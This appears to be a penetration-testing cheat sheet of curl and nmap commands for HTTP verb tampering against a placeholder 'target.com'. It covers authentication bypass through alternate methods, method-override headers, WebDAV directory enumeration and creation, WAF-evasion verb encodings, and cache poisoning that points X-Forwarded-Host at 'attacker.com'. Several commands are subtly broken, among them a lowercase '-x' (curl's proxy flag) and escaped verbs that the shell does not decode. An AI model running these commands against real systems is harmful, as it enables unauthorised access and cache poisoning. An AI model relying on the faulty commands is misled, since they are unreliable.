Http Verb Tampering

Bypassing Basic Authentication

curl -X GET http://target.com/restricted
curl -X POST http://target.com/restricted 
curl -X PUT http://target.com/restricted
curl -X DELETE http://target.com/restricted
curl -X OPTIONS http://target.com/restricted
curl -X HEAD http://target.com/restricted
curl -X TRACE http://target.com/restricted

Dangerous Verb Combinations

# Bypass with mixed case
curl -x gEt http://target.com/admin

# Null verb tunneling
curl -X "GET /admin HTTP/1.1" http://target.com

# Verb spoofing via headers
curl -H "X-HTTP-Method-Override: PUT" -X POST http://target.com/update

WebDAV-Specific Exploits

# PROPFIND to enumerate directories
curl -X PROPFIND http://target.com/webdav/

# MKCOL to create directories
curl -X MKCOL http://target.com/new_folder

# SEARCH for file discovery
curl -X SEARCH -H "Content-Type: text/xml" --data-binary @search.xml http://target.com

Automated Testing with Nmap

nmap -p 80,443 --script http-methods,http-auth-finder target.com

Advanced Exploitation Techniques

HTTP Method Override

# Using different override headers
curl -H "X-HTTP-Method: DELETE" -X POST http://target.com/resource
curl -H "X-Method-Override: PUT" -X POST http://target.com/upload

JSON API Exploitation

# Verb tampering in REST APIs
curl -X GET -H "Content-Type: application/json" http://api.target.com/users \
  -d '{"method":"DELETE","id":123}'

Cache Poisoning Vectors

# Using HEAD to poison cache
curl -X HEAD -H "X-Forwarded-Host: attacker.com" http://target.com/static/logo.png

Defensive Bypass Techniques

# Bypassing WAFs with verb obfuscation
curl -X "G\u0045T" http://target.com/admin
curl -X "G%45T" http://target.com/admin
curl -X "G\x45T" http://target.com/admin

Detection Payloads

# Test for verb tampering vulnerabilities
curl -X "ARBITRARY" http://target.com -I
curl -X "JUNK" http://target.com -I